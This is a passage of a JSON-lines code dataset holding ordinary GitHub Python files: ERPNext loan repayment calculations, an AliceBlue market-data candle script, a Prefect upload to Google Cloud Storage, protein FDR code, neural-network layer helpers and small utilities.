penalty_amount,\n\t\t\t\"interest_payable\": interest_payable,\n\t\t\t\"payable_principal_amount\": payable_principal_amount,\n\t\t\t\"amount_paid\": amount_paid,\n\t\t\t\"loan_type\": loan_type,\n\t\t\t\"payroll_payable_account\": payroll_payable_account,\n\t\t}\n\t).insert()\n\n\treturn lr\n\n\ndef get_accrued_interest_entries(against_loan, posting_date=None):\n\tif not posting_date:\n\t\tposting_date = getdate()\n\n\tunpaid_accrued_entries = frappe.db.sql(\n\t\t\"\"\"\n\t\t\tSELECT name, posting_date, interest_amount - paid_interest_amount as interest_amount,\n\t\t\t\tpayable_principal_amount - paid_principal_amount as payable_principal_amount,\n\t\t\t\taccrual_type\n\t\t\tFROM\n\t\t\t\t`tabLoan Interest Accrual`\n\t\t\tWHERE\n\t\t\t\tloan = %s\n\t\t\tAND posting_date <= %s\n\t\t\tAND (interest_amount - paid_interest_amount > 0 OR\n\t\t\t\tpayable_principal_amount - paid_principal_amount > 0)\n\t\t\tAND\n\t\t\t\tdocstatus = 1\n\t\t\tORDER BY posting_date\n\t\t\"\"\",\n\t\t(against_loan, posting_date),\n\t\tas_dict=1,\n\t)\n\n\treturn unpaid_accrued_entries\n\n\ndef get_penalty_details(against_loan):\n\tpenalty_details = frappe.db.sql(\n\t\t\"\"\"\n\t\tSELECT posting_date, (penalty_amount - total_penalty_paid) as pending_penalty_amount\n\t\tFROM `tabLoan Repayment` where posting_date >= (SELECT MAX(posting_date) from `tabLoan Repayment`\n\t\twhere against_loan = %s) and docstatus = 1 and against_loan = %s\n\t\"\"\",\n\t\t(against_loan, against_loan),\n\t)\n\n\tif penalty_details:\n\t\treturn penalty_details[0][0], flt(penalty_details[0][1])\n\telse:\n\t\treturn None, 0\n\n\ndef regenerate_repayment_schedule(loan, cancel=0):\n\tfrom erpnext.loan_management.doctype.loan.loan import (\n\t\tadd_single_month,\n\t\tget_monthly_repayment_amount,\n\t)\n\n\tloan_doc = frappe.get_doc(\"Loan\", loan)\n\tnext_accrual_date = None\n\taccrued_entries = 0\n\tlast_repayment_amount = 0\n\tlast_balance_amount = 0\n\n\tfor term in reversed(loan_doc.get(\"repayment_schedule\")):\n\t\tif not term.is_accrued:\n\t\t\tnext_accrual_date = term.payment_date\n\t\t\tloan_doc.remove(term)\n\t\telse:\n\t\t\taccrued_entries += 1\n\t\t\tif not last_repayment_amount:\n\t\t\t\tlast_repayment_amount = term.total_payment\n\t\t\tif not last_balance_amount:\n\t\t\t\tlast_balance_amount = term.balance_loan_amount\n\n\tloan_doc.save()\n\n\tbalance_amount = get_pending_principal_amount(loan_doc)\n\n\tif loan_doc.repayment_method == \"Repay Fixed Amount per Period\":\n\t\tmonthly_repayment_amount = flt(\n\t\t\tbalance_amount / len(loan_doc.get(\"repayment_schedule\")) - accrued_entries\n\t\t)\n\telse:\n\t\trepayment_period = loan_doc.repayment_periods - accrued_entries\n\t\tif not cancel and repayment_period > 0:\n\t\t\tmonthly_repayment_amount = get_monthly_repayment_amount(\n\t\t\t\tbalance_amount, loan_doc.rate_of_interest, repayment_period\n\t\t\t)\n\t\telse:\n\t\t\tmonthly_repayment_amount = last_repayment_amount\n\t\t\tbalance_amount = last_balance_amount\n\n\tpayment_date = next_accrual_date\n\n\twhile balance_amount > 0:\n\t\tinterest_amount = flt(balance_amount * flt(loan_doc.rate_of_interest) / (12 * 100))\n\t\tprincipal_amount = monthly_repayment_amount - interest_amount\n\t\tbalance_amount = flt(balance_amount + interest_amount - monthly_repayment_amount)\n\t\tif balance_amount < 0:\n\t\t\tprincipal_amount += balance_amount\n\t\t\tbalance_amount = 0.0\n\n\t\ttotal_payment = principal_amount + interest_amount\n\t\tloan_doc.append(\n\t\t\t\"repayment_schedule\",\n\t\t\t{\n\t\t\t\t\"payment_date\": 
payment_date,\n\t\t\t\t\"principal_amount\": principal_amount,\n\t\t\t\t\"interest_amount\": interest_amount,\n\t\t\t\t\"total_payment\": total_payment,\n\t\t\t\t\"balance_loan_amount\": balance_amount,\n\t\t\t},\n\t\t)\n\t\tnext_payment_date = add_single_month(payment_date)\n\t\tpayment_date = next_payment_date\n\n\tloan_doc.save()\n\n\ndef get_pending_principal_amount(loan):\n\tif loan.status in (\"Disbursed\", \"Closed\") or loan.disbursed_amount >= loan.loan_amount:\n\t\tpending_principal_amount = (\n\t\t\tflt(loan.total_payment)\n\t\t\t- flt(loan.total_principal_paid)\n\t\t\t- flt(loan.total_interest_payable)\n\t\t\t- flt(loan.written_off_amount)\n\t\t)\n\telse:\n\t\tpending_principal_amount = (\n\t\t\tflt(loan.disbursed_amount)\n\t\t\t- flt(loan.total_principal_paid)\n\t\t\t- flt(loan.total_interest_payable)\n\t\t\t- flt(loan.written_off_amount)\n\t\t)\n\n\treturn pending_principal_amount\n\n\n# This function returns the amounts that are payable at the time of loan repayment based on posting date\n# So it pulls all the unpaid Loan Interest Accrual Entries and calculates the penalty if applicable\n\n\ndef get_amounts(amounts, against_loan, posting_date):\n\tprecision = cint(frappe.db.get_default(\"currency_precision\")) or 2\n\n\tagainst_loan_doc = frappe.get_doc(\"Loan\", against_loan)\n\tloan_type_details = frappe.get_doc(\"Loan Type\", against_loan_doc.loan_type)\n\taccrued_interest_entries = get_accrued_interest_entries(against_loan_doc.name, posting_date)\n\n\tcomputed_penalty_date, pending_penalty_amount = get_penalty_details(against_loan)\n\tpending_accrual_entries = {}\n\n\ttotal_pending_interest = 0\n\tpenalty_amount = 0\n\tpayable_principal_amount = 0\n\tfinal_due_date = \"\"\n\tdue_date = \"\"\n\n\tfor entry in accrued_interest_entries:\n\t\t# Loan repayment due date is one day after the loan interest is accrued\n\t\t# no of late days are calculated based on loan repayment posting date\n\t\t# and if no_of_late days are positive then penalty is levied\n\n\t\tdue_date = add_days(entry.posting_date, 1)\n\t\tdue_date_after_grace_period = add_days(due_date, loan_type_details.grace_period_in_days)\n\n\t\t# Consider one day after already calculated penalty\n\t\tif computed_penalty_date and getdate(computed_penalty_date) >= due_date_after_grace_period:\n\t\t\tdue_date_after_grace_period = add_days(computed_penalty_date, 1)\n\n\t\tno_of_late_days = date_diff(posting_date, due_date_after_grace_period) + 1\n\n\t\tif (\n\t\t\tno_of_late_days > 0\n\t\t\tand (not against_loan_doc.repay_from_salary)\n\t\t\tand entry.accrual_type == \"Regular\"\n\t\t):\n\t\t\tpenalty_amount += (\n\t\t\t\tentry.interest_amount * (loan_type_details.penalty_interest_rate / 100) * no_of_late_days\n\t\t\t)\n\n\t\ttotal_pending_interest += entry.interest_amount\n\t\tpayable_principal_amount += entry.payable_principal_amount\n\n\t\tpending_accrual_entries.setdefault(\n\t\t\tentry.name,\n\t\t\t{\n\t\t\t\t\"interest_amount\": flt(entry.interest_amount, precision),\n\t\t\t\t\"payable_principal_amount\": flt(entry.payable_principal_amount, precision),\n\t\t\t},\n\t\t)\n\n\t\tif due_date and not final_due_date:\n\t\t\tfinal_due_date = add_days(due_date, loan_type_details.grace_period_in_days)\n\n\tpending_principal_amount = get_pending_principal_amount(against_loan_doc)\n\n\tunaccrued_interest = 0\n\tif due_date:\n\t\tpending_days = date_diff(posting_date, due_date) + 1\n\telse:\n\t\tlast_accrual_date = get_last_accrual_date(against_loan_doc.name)\n\t\tpending_days = date_diff(posting_date, last_accrual_date) + 
1\n\n\tif pending_days > 0:\n\t\tprincipal_amount = flt(pending_principal_amount, precision)\n\t\tper_day_interest = get_per_day_interest(\n\t\t\tprincipal_amount, loan_type_details.rate_of_interest, posting_date\n\t\t)\n\t\tunaccrued_interest += pending_days * per_day_interest\n\n\tamounts[\"pending_principal_amount\"] = flt(pending_principal_amount, precision)\n\tamounts[\"payable_principal_amount\"] = flt(payable_principal_amount, precision)\n\tamounts[\"interest_amount\"] = flt(total_pending_interest, precision)\n\tamounts[\"penalty_amount\"] = flt(penalty_amount + pending_penalty_amount, precision)\n\tamounts[\"payable_amount\"] = flt(\n\t\tpayable_principal_amount + total_pending_interest + penalty_amount, precision\n\t)\n\tamounts[\"pending_accrual_entries\"] = pending_accrual_entries\n\tamounts[\"unaccrued_interest\"] = flt(unaccrued_interest, precision)\n\n\tif final_due_date:\n\t\tamounts[\"due_date\"] = final_due_date\n\n\treturn amounts\n\n\n@frappe.whitelist()\ndef calculate_amounts(against_loan, posting_date, payment_type=\"\"):\n\tamounts = {\n\t\t\"penalty_amount\": 0.0,\n\t\t\"interest_amount\": 0.0,\n\t\t\"pending_principal_amount\": 0.0,\n\t\t\"payable_principal_amount\": 0.0,\n\t\t\"payable_amount\": 0.0,\n\t\t\"unaccrued_interest\": 0.0,\n\t\t\"due_date\": \"\",\n\t}\n\n\tamounts = get_amounts(amounts, against_loan, posting_date)\n\n\t# update values for closure\n\tif payment_type == \"Loan Closure\":\n\t\tamounts[\"payable_principal_amount\"] = amounts[\"pending_principal_amount\"]\n\t\tamounts[\"interest_amount\"] += amounts[\"unaccrued_interest\"]\n\t\tamounts[\"payable_amount\"] = (\n\t\t\tamounts[\"payable_principal_amount\"] + amounts[\"interest_amount\"] + amounts[\"penalty_amount\"]\n\t\t)\n\n\treturn amounts\n","repo_name":"RafMo20D/erpnext-ksa-op","sub_path":"erpnext/loan_management/doctype/loan_repayment/loan_repayment.py","file_name":"loan_repayment.py","file_ext":"py","file_size_in_byte":23592,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"36218907034","text":"import datetime\nimport time\nimport threading\nfrom alice_blue import *\nimport pandas as pd\nfrom config import Credentials\n# To make django-models work outside django\nimport sys\nimport os\nimport django\n\nsys.path.append(\"/Users/nitishgupta/Desktop/algotradersonline/backend/src\")\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'backend.settings')\ndjango.setup()\nfrom optionchain.models import LTP\nfrom strategiesAPI.models import OneMIN\n\nSCRIPT_LIST = [\n 'ACC', 'ADANIENT', 'ADANIPORTS', 'AMBUJACEM', 'APOLLOHOSP', 'ASIANPAINT', 'AUBANK',\n 'AUROPHARMA', 'AXISBANK', 'BAJAJ-AUTO', 'BAJFINANCE', 'BATAINDIA', 'BHARATFORG',\n 'BHARTIARTL', 'BIOCON', 'BPCL', 'CHOLAFIN', 'CIPLA', 'COALINDIA', 'COFORGE', 'DABUR',\n 'DIVISLAB', 'DLF', 'DRREDDY', 'EICHERMOT', 'GODREJCP', 'GODREJPROP', 'GRASIM', 'HAVELLS',\n 'HCLTECH', 'HDFC', 'HDFCBANK', 'HDFCLIFE', 'HEROMOTOCO', 'HINDALCO', 'HINDPETRO',\n 'HINDUNILVR', 'ICICIBANK', 'ICICIPRULI', 'IGL', 'INDIGO', 'INDUSINDBK', 'INFY',\n 'IRCTC', 'ITC', 'JINDALSTEL', 'JSWSTEEL', 'JUBLFOOD', 'KOTAKBANK', 'LICHSGFIN',\n 'LT', 'LTI', 'LUPIN', 'M&M', 'MARUTI', 'MINDTREE', 'MUTHOOTFIN',\n 'PEL', 'PIDILITIND', 'PVR', 'RELIANCE', 'SBICARD', 'SBILIFE', 'SBIN', 'SRF',\n 'SRTRANSFIN', 'SUNPHARMA', 'TATACHEM', 'TATACONSUM', 'TATAMOTORS', 'TATAPOWER',\n 'TATASTEEL', 'TCS', 'TECHM', 'TITAN', 'TVSMOTOR', 'UPL', 'VEDL', 'VOLTAS', 'WIPRO',\n 'ZEEL']\n\nsocket_opened = False\ndf = pd.DataFrame()\ndf_final = 
pd.DataFrame()\nORB_timeFrame = 60 # in seconds\nx = 1\n\nbank = \"\"\nnifty = \"\"\n\n\ndef login():\n global bank\n global nifty\n session_id = AliceBlue.login_and_get_sessionID(\n username=Credentials.UserName.value,\n password=Credentials.PassWord.value,\n twoFA=Credentials.TwoFA.value,\n api_secret=Credentials.SecretKey.value,\n app_id=Credentials.AppId.value)\n alice = AliceBlue(username=Credentials.UserName.value,\n session_id=session_id)\n\n # alice.start_websocket(subscribe_callback=event_handler_quote_update)\n # alice.subscribe([\n # alice.get_instrument_by_symbol('NSE', i.upper() + '-EQ') for i in SCRIPT_LIST\n # ], LiveFeedType.TICK_DATA)\n #\n # alice.subscribe(alice.get_instrument_by_symbol('NSE', 'NIFTY 50'),\n # LiveFeedType.TICK_DATA)\n #\n # alice.subscribe(alice.get_instrument_by_symbol('NSE', 'NIFTY BANK'),\n # LiveFeedType.TICK_DATA)\n # alice.subscribe(alice.get_instrument_by_symbol('NSE', 'INDIA VIX'),\n # LiveFeedType.TICK_DATA)\n # print(alice.search_instruments('NFO', 'NIFTY'))\n\n # Get monthly and weekly expiry\n df = pd.DataFrame(alice.search_instruments('NFO', 'BANKNIFTY'))\n df = df.filter(['expiry']) # Filter only expiry dates\n df.drop_duplicates(inplace=True) # keeping unique values\n df = df.sort_values(by=['expiry'], ascending=True)\n arr = df.to_numpy() # Converts it to a 2D array of size n x 1\n t = arr[0][0].month # Getting the month of the first date\n for i in range(0, len(arr)):\n if arr[i][0].month > t:\n break\n date = arr[i][0] # This will save the monthly expiry\n\n print(alice.get_instrument_for_fno(symbol = 'NIFTY2320218150PE'))\n # q = LTP.objects.get(name='Nifty Bank')\n # x = q.ltp\n # x = (int)(x / 100) * 100\n # for i in range(x - 1000, x + 1000, 100):\n # alice.subscribe(alice.get_instrument_for_fno(symbol='BANKNIFTY',\n # expiry_date=arr[0][0],\n # is_fut=False,\n # strike=i,\n # is_CE=False),\n # LiveFeedType.TICK_DATA)\n # alice.subscribe(alice.get_instrument_for_fno(symbol='BANKNIFTY',\n # expiry_date=arr[0][0],\n # is_fut=False,\n # strike=i,\n # is_CE=True),\n # LiveFeedType.TICK_DATA)\n #\n # q = LTP.objects.get(name='Nifty 50')\n # y = q.ltp\n # y = (int)(y / 100) * 100\n # for i in range(y - 1000, y + 1000, 100):\n # alice.subscribe(alice.get_instrument_for_fno(symbol='NIFTY',\n # expiry_date=arr[0][0],\n # is_fut=False,\n # strike=i,\n # is_CE=False),\n # LiveFeedType.TICK_DATA)\n # alice.subscribe(alice.get_instrument_for_fno(symbol='NIFTY',\n # expiry_date=arr[0][0],\n # is_fut=False,\n # strike=i,\n # is_CE=True),\n # LiveFeedType.TICK_DATA)\n\n\ndef event_handler_quote_update(message):\n global df\n global bank\n global nifty\n print(message)\n\n ltp = message['ltp']\n\n token = message['instrument'].token\n if token == 26000:\n instrument = \"Nifty 50\"\n elif token == 26009:\n instrument = \"Nifty Bank\"\n else:\n instrument = message['instrument'].symbol\n\n p, created = LTP.objects.get_or_create(name=instrument)\n p.ltp = ltp\n p.save()\n\n timestamp = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\")\n exchange = message['instrument'].exchange\n\n if 'volume' in message:\n df_new = pd.DataFrame(\n {\n 'symbol': instrument,\n 'timestamp': timestamp,\n 'ltp': ltp,\n 'exchange': exchange,\n 'volume': message['volume']\n },\n index=[0])\n df = pd.concat([df, df_new], ignore_index=True)\n\n\ndef create_ohlc():\n start = time.time()\n global df\n copydf = df.copy(deep=True).drop_duplicates()\n df = df.iloc[0:0]\n get_ohlc(copydf)\n interval = ORB_timeFrame - (time.time() - start)\n print(\n f\"Next check will start 
after {interval} sec : {datetime.datetime.now()}\"\n )\n\n threading.Timer(interval, create_ohlc).start()\n\n\ndef get_ohlc(dataframe):\n grouped = dataframe.groupby('symbol')\n\n global df_final\n global x\n # book = load_workbook(\n # f'/home/vmadmin/Desktop/backend/day_data/{datetime.datetime.now().strftime(\"%Y-%m-%d\")}_1MIN.xlsx')\n # writer = pd.ExcelWriter(\n # f'/home/vmadmin/Desktop/backend/day_data/{datetime.datetime.now().strftime(\"%Y-%m-%d\")}_1MIN.xlsx',\n # engine='openpyxl')\n # writer.book = book\n # writer.sheets = {ws.title: ws for ws in book.worksheets}\n\n for name, group in grouped:\n group = group.sort_values('timestamp')\n timestamp = group['timestamp'].iloc[0]\n symbol = name\n volume = group['volume'].iloc[-1] - group['volume'].iloc[0]\n open = group['ltp'].iloc[0]\n close = group['ltp'].iloc[-1]\n high = group['ltp'].max()\n low = group['ltp'].min()\n exchange = group['exchange'].iloc[0]\n # atp = group['atp'].iloc[-1]\n q, created = OneMIN.objects.get_or_create(name=name)\n q.timestamp = timestamp\n q.volume = volume\n q.open = open\n q.close = close\n q.high = high\n q.low = low\n q.exchange = exchange\n # q.atp = atp\n q.save()\n data = {\n 'timestamp': timestamp,\n 'symbol': symbol,\n 'volume': volume,\n 'open': open,\n 'close': close,\n 'high': high,\n 'low': low,\n 'exchange': exchange,\n # 'atp':atp\n }\n\n df_append = pd.DataFrame(data, index=[0])\n # df_append.to_excel(writer, header=False, index=False, startrow=x, startcol=0)\n x += 1\n # writer.save()\n # book.close()\n\n\nif __name__ == '__main__':\n # while ((datetime.datetime.now().time() <= datetime.time(9, 14, 00))\n # or (datetime.datetime.now().time() >= datetime.time(22, 30, 00))):\n # pass\n\n login()\n main_interval = ORB_timeFrame - datetime.datetime.now().second\n\n print(\"start in \", main_interval)\n time.sleep(main_interval)\n create_ohlc()\n","repo_name":"nitishgupta08/algotradersonline","sub_path":"backend/src/live_candle_data/1_min_candle.py","file_name":"1_min_candle.py","file_ext":"py","file_size_in_byte":8443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40848991525","text":"import pandas as pd\nfrom prefect import flow, task\nfrom prefect_gcp import GcpCredentials\n\n\n@task(log_prints=True)\ndef get_file(dataset_url: str, typedict: dict) -> pd.DataFrame:\n df = pd.read_csv(dataset_url, engine=\"pyarrow\", dtype=typedict)\n print(df.info())\n print(len(df))\n return df\n\n\n@task(log_prints=True)\ndef write_gcs(df: pd.DataFrame, gcs_path: str) -> None:\n gcp_credentials_block = GcpCredentials.load(\n \"ny-rides-gcpcred-bucket\"\n ) # gcp-cred-file\")\n credentials = gcp_credentials_block.get_credentials_from_service_account()\n print(\"path \" + gcs_path)\n print(gcp_credentials_block.service_account_file)\n df.to_parquet(\n gcs_path,\n engine=\"pyarrow\",\n compression=\"snappy\",\n storage_options={\n \"token\": credentials\n }\n )\n\n\n@flow(log_prints=True)\ndef parquet_to_gcs():\n \"\"\"\n Experimental -try out things- download csv files from\n github, upload parquet files to gsc, using pandas for\n both tasks, while keeping the dtypes consistent among\n all files.\n \"\"\"\n typedict = {\n \"dispatching_base_num\": \"string\",\n \"pickup_datetime\": \"datetime64[ns]\",\n \"dropOff_datetime\": \"datetime64[ns]\",\n \"PUlocationID\": \"Int64\",\n \"DOlocationID\": \"Int64\",\n \"SR_Flag\": \"Int64\",\n \"Affiliated_base_number\": \"string\",\n }\n year = 2019\n service = \"fhv\"\n\n for month in range(1, 13):\n 
dataset_file = f\"{service}_tripdata_{year}-{month:02}\"\n        dataset_url = f\"https://github.com/DataTalksClub/nyc-tlc-data/releases/download/{service}/{dataset_file}.csv.gz\"\n        df = get_file(dataset_url, typedict)\n        gcs_path = f\"gs://ny_rides_data_lake_mythic-plexus-375706/data/{service}/{service}_tripdata_{year}-{month:02}.parquet\"\n\n        write_gcs(df, gcs_path)\n        print(str(month) + \" done\")\n\n\nif __name__ == \"__main__\":\n    parquet_to_gcs()\n","repo_name":"larsskaret/DataTalksClub_Data-Engineering","sub_path":"homework_week3/q8_web_to_gcs.py","file_name":"q8_web_to_gcs.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32451556568","text":"import csv\nimport sys\n\n\n\ndef analyze_results(csv_file):\n    total_compute_time = 0\n    num_correct = 0\n    num_total = 0\n\n    with open(csv_file, mode=\"r\") as file:\n        reader = csv.DictReader(file)\n        for row in reader:\n            total_compute_time += float(row[\"Compute Time\"])\n            num_total += 1\n            if row[\"Correct\"] == \"True\":\n                num_correct += 1\n\n    if num_total > 0:\n        average_compute_time = total_compute_time / num_total\n        accuracy_percentage = (num_correct / num_total) * 100\n    else:\n        average_compute_time = 0\n        accuracy_percentage = 0\n\n    return average_compute_time, accuracy_percentage\n\n\n\nif __name__ == '__main__':\n\n    # both uid and time_elapsed are required arguments\n    if len(sys.argv) < 3:\n        sys.exit(1)\n\n    uid = sys.argv[1]\n    time_elapsed = sys.argv[2]\n\n    csv_file = f\"protocol_results~{uid}.csv\"\n    output_file = f\"analysis_results~{uid}.txt\"\n\n    average_compute_time, accuracy_percentage = analyze_results(csv_file)\n\n    with open(output_file, mode=\"w\") as file:\n        file.write(f\"Average Compute Time (per iteration): {round(average_compute_time * 1e9, -2)/1000} microseconds (100 ns precision) | {average_compute_time} seconds\\\n\")\n        file.write(f\"Total Time Elapsed: {time_elapsed} seconds\\\n\")\n        file.write(f\"Accuracy Percentage: {accuracy_percentage}%\")\n\n\n    print(f\"\\\tAnalysis results recorded in '{output_file}'\")\n\n\n\n\n\n\n\n\n\n\n","repo_name":"evan-kolberg/ASR-project","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14334769899","text":"import logging\nfrom typing import List, Dict, Optional\nfrom datetime import datetime\n\nimport numpy as np\n\nfrom . import helpers\nfrom . 
import entrapment\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef calculateProteinFDRs(proteinGroups, proteinScores):\n logger.info(\"Calculating protein group-level FDRs\")\n numDecoys, numEntrapments, numTargets = 0, 0, 0\n proteinGroupInfoList = list()\n for proteinGroup, proteinScore in zip(proteinGroups, proteinScores):\n if proteinScore == -100.0:\n break\n \n if helpers.isDecoy(proteinGroup):\n numDecoys += 1\n else:\n numTargets += 1\n if entrapment.isEntrapment(proteinGroup):\n numEntrapments += 1\n reportedFdr = (numDecoys + 1) / (numTargets + 1)\n observedFdr = (numEntrapments + 1) / (numTargets + 1)\n\n skipForCounting = helpers.isDecoy(proteinGroup) or helpers.isObsolete(proteinGroup)\n proteinGroupInfoList.append((reportedFdr, observedFdr, skipForCounting))\n \n logger.info(f\"Targets: {numTargets}, Decoys: {numDecoys}\")\n if numEntrapments > 1:\n logger.info(f\"Targets: {numTargets}, Entrapments: {numEntrapments}, Targets-Entrapments: {numTargets - numEntrapments}, Decoys: {numDecoys}\")\n \n if len(proteinGroupInfoList) == 0:\n raise Exception(\"No proteins with scores found, make sure that protein identifiers are consistent in the evidence and fasta files\")\n \n reportedFdrs, observedFdrs, skipForCounting = zip(*proteinGroupInfoList)\n reportedQvals, observedQvals = fdrsToQvals(reportedFdrs), fdrsToQvals(observedFdrs)\n logger.info(f\"#Target protein groups at 1% decoy FDR: {countBelowThreshold(reportedQvals, 0.01, skipForCounting)}\")\n if numEntrapments > 1:\n logger.info(f\"#Target protein groups at 1% entrapment FDR: {countBelowThreshold(observedFdrs, 0.01, skipForCounting)}\")\n logger.info(f\"Decoy FDR at 1% entrapment FDR: {'%.2g' % (reportedQvals[countBelowThreshold(observedFdrs, 0.01)])}\")\n logger.info(f\"Entrapment FDR at 1% decoy FDR: {'%.2g' % (observedFdrs[countBelowThreshold(reportedQvals, 0.01)])}\")\n \n #printReportedAndEntrapmentFDRs(reportedQvals, observedQvals)\n \n return reportedQvals, observedQvals\n\n\ndef printReportedAndEntrapmentFDRs(reportedQvals, observedQvals):\n import csv\n writer = csv.writer(open(f'protein_fdr_calibration_{datetime.now().strftime(\"%d%m%Y_%H%M%S\")}.txt', 'w'), delimiter = '\\t')\n for reportedQval, observedQval in zip(reportedQvals, observedQvals):\n writer.writerow([reportedQval, observedQval])\n\n\ndef fdrsToQvals(fdrs: List[float]) -> np.array:\n \"\"\"\n Makes a list of FDRs monotonically increasing (sometimes referred to as q-values after monotonization)\n \"\"\"\n return np.minimum.accumulate(fdrs[::-1])[::-1]\n\n\ndef countBelowThreshold(qvals: List[float], qvalThreshold: float, skipForCounting: Optional[List[bool]] = None):\n \"\"\"\n Counts number of q-values below a threshold, if skipForCounting are provided, only the targets are counted\n \"\"\"\n if skipForCounting is None:\n return len([1 for x in qvals if x < qvalThreshold])\n else:\n return len([1 for x, skip in zip(qvals, skipForCounting) if x < qvalThreshold and not skip])\n \n","repo_name":"kusterlab/picked_group_fdr","sub_path":"picked_group_fdr/fdr.py","file_name":"fdr.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"38566338320","text":"import pygame\r\nimport sys\r\nimport pygame.locals\r\n\r\npygame.init()\r\n\r\nsurface = pygame.display.set_mode( (300, 300) )\r\n\r\nsurface.fill( (255, 255, 255))\r\n\r\npygame.display.update()\r\n\r\nwhile True:\r\n\te = pygame.event.wait()\r\n\tif e.type == 
pygame.locals.QUIT:\r\n\t\tpygame.quit()\r\n\t\tsys.exit()\r\n\t\r\n","repo_name":"codenuri/PYTHON_BASIC","sub_path":"PYGAME1_TUTORIAL/pygame5_draw1.py","file_name":"pygame5_draw1.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38555860589","text":"from django.core.management.base import BaseCommand, CommandError\nfrom monitor.models import TrackedSite\nfrom optparse import make_option\nimport os\n\n\nclass Command(BaseCommand):\n\n    help = \"\"\"Adds new sites from configuration file.\n    The format of data should be : \\\n\n    url criteria\n    url2 criteria2\n    ...\n    url5 criteria5\"\"\"\n\n    option_list = BaseCommand.option_list + (\n        make_option('--file',\n                    action='store',\n                    dest='file',\n                    default=False,\n                    help='Custom path to configuration file'),\n    )\n\n    def open_file(self, filename):\n        # Open a file\n        self.stdout.write(\"Opening file {}\".format(filename))\n        if not os.path.exists(filename):\n            self.stdout.write(\"Filename {} does not exist\".format(filename))\n            return\n\n        fo = open(filename, \"r+\")\n        self.stdout.write(\"Name of the file: {}\".format(filename))\n        lines = fo.readlines()\n        fo.close()\n\n        for line in lines:\n            if ('www' in line or 'http' in line) and ' ' in line:\n                self.stdout.write(\"{} URL is OK to track\".format(line.strip()))\n            else:\n                self.stdout.write(\"{} is not a proper \"\n                                  \"line with site url\".format(line.strip()))\n                continue\n\n            site_name, content_requirement = line.strip().split(\" \", 1)\n            self.stdout.write(\"site_name : {},\"\n                              \"criteria : {}\".format(site_name,\n                                                     content_requirement))\n            TrackedSite.objects.get_or_create(\n                name=site_name,\n                content_requirement=content_requirement)\n\n    def handle(self, *args, **options):\n        if options['file']:\n            self.open_file(options['file'])\n        else:\n            default_file = 'sites.txt'\n            self.stdout.write(\"Opening default configuration file {}\".format(\n                default_file))\n            self.open_file(default_file)\n","repo_name":"tomaszd/turbo-check","sub_path":"blstream/monitor_project/monitor/management/commands/add_sites.py","file_name":"add_sites.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2558285965","text":"from .layers import *\nfrom cs231n.fast_layers import *\nfrom nndl.conv_layers import *\n\n\"\"\" \nThis code was originally written for CS 231n at Stanford University\n(cs231n.stanford.edu). It has been modified in various areas for use in the\nECE 239AS class at UCLA. This includes the descriptions of what code to\nimplement as well as some slight potential changes in variable names to be\nconsistent with class nomenclature. We thank Justin Johnson & Serena Yeung for\npermission to use this code. To see the original version, please visit\ncs231n.stanford.edu. 
\n\"\"\"\n\ndef affine_relu_forward(x, w, b):\n \"\"\"\n Convenience layer that performs an affine transform followed by a ReLU\n\n Inputs:\n - x: Input to the affine layer\n - w, b: Weights for the affine layer\n\n Returns a tuple of:\n - out: Output from the ReLU\n - cache: Object to give to the backward pass\n \"\"\"\n a, fc_cache = affine_forward(x, w, b)\n out, relu_cache = relu_forward(a)\n cache = (fc_cache, relu_cache)\n return out, cache\n\n\ndef affine_relu_backward(dout, cache):\n \"\"\"\n Backward pass for the affine-relu convenience layer\n \"\"\"\n fc_cache, relu_cache = cache\n da = relu_backward(dout, relu_cache)\n dx, dw, db = affine_backward(da, fc_cache)\n return dx, dw, db\n\n\n\n\ndef conv_batchnorm_relu_pool_forward(x, w, b, conv_param, pool_param, gamma, beta, bn_param):\n out, conv_cache = conv_forward_fast(x, w, b, conv_param)\n out, bn_cache = spatial_batchnorm_forward(out, gamma, beta, bn_param)\n out, relu_cache = relu_forward(out)\n out, pool_cache = max_pool_forward_fast(out, pool_param)\n\n cache = (conv_cache, bn_cache, relu_cache, pool_cache)\n return out, cache\n\ndef conv_batchnorm_relu_pool_backward(dout, cache):\n conv_cache, bn_cache, relu_cache, pool_cache = cache\n dout = max_pool_backward_fast(dout, pool_cache)\n dout = relu_backward(dout, relu_cache)\n dout, dgamma, dbeta = spatial_batchnorm_backward(dout, bn_cache)\n dx, dw, db = conv_backward_fast(dout, conv_cache)\n\n return dx, dw, db, dgamma, dbeta","repo_name":"Ji-Keyu/CNN-with-numpy","sub_path":"nndl/layer_utils.py","file_name":"layer_utils.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30942197747","text":"from datetime import datetime, date\nimport json\nfrom Historic_Crypto import HistoricalData\n\nONE_DAY = 86400\nONE_HOUR = 3600\nFILE_FORMAT = '{currency_pair}_{interval}_data.json'\n\n\nclass PriceHistory:\n def __init__(self, currency_pair, interval, start='2017-01-01-00-00'):\n # new = HistoricalData('BTC-USD',86400,'2017-01-01-00-00').retrieve_data()\n self.currency_pair = currency_pair\n self.interval = interval\n self.date_format = self._date_format_for_interval(interval)\n self.history_dict = self._get_history(currency_pair, interval, start)\n\n def __getitem__(self, date):\n return self.history_dict[date.strftime(self.date_format)]\n\n def __setitem__(self, date, price):\n self.history_dict[date.strftime(self.date_format)] = price\n\n def _date_format_for_interval(self, interval):\n if interval == ONE_DAY:\n date_format = '%Y-%m-%d'\n elif interval == 